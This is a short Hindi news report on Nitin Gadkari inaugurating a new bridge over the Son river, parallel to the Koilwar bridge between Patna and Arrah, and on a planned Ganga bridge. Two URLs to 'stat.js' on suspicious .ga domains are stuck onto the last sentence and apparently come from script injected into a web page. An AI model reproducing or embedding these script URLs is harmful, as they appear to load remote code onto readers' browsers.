बिहारवासियों के लिए बड़ी खुशखबरी है की मंत्री नितिन गडकरी (Nitin Gadkari) ने बिहारवासियों को पटना और आरा के बीच एक बेहतरीन लाइफलाइन कोईलवर पुल के समानांतर एक और नए पूल का उद्घाटन किया है जो 266 करोड़ रुपए की लागत से बनकर तैयार हुआ है। सबसे बड़ी बात यह है की सोन नदी पर 158 साल बाद नए पुल का तोहफा मिला है।
इस पूल के उद्घाटन होने से दक्षिण व मध्य बिहार के बीच यातायात सुगम हो गया है। मिली जानकारी के मुताबिक इस नए पूल पर फिलहाल तीन लेन पर यातायात आरंभ हो पाया है। चौथी लेन का का निर्माण कार्य अभी प्रगति पर हैं। आपको बता दे की यह पूल कुल 37 खंभों पर टिके हुए हैं। सभा के सम्बोधन के दौरान मंत्री नितिन गडकरी ने कहा की हमारा बिहार बिकास की ओर लगातार अग्रसर हैं।
केंद्रीय मंत्री ने इस मौके पर कई सड़क परियोजनाओं के काम आरंभ होने की तारीख भी बतायी। साथ साथ मंत्री नितिन गडकरी ने कहा कि बिहार के शेरपुर से दिघवारा के बीच गंगा नदी पर 3000 करोड़ रुपए की लागत से पुल का निर्माण किया जाना है जिसका निर्माण कार्य अगले वर्ष अप्रैल में आरंभ हो जायेगा। आपको यह बता दे की यह प्रोजेक्ट पटना रिंग रोड पैकेज-2 का हिस्सा है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms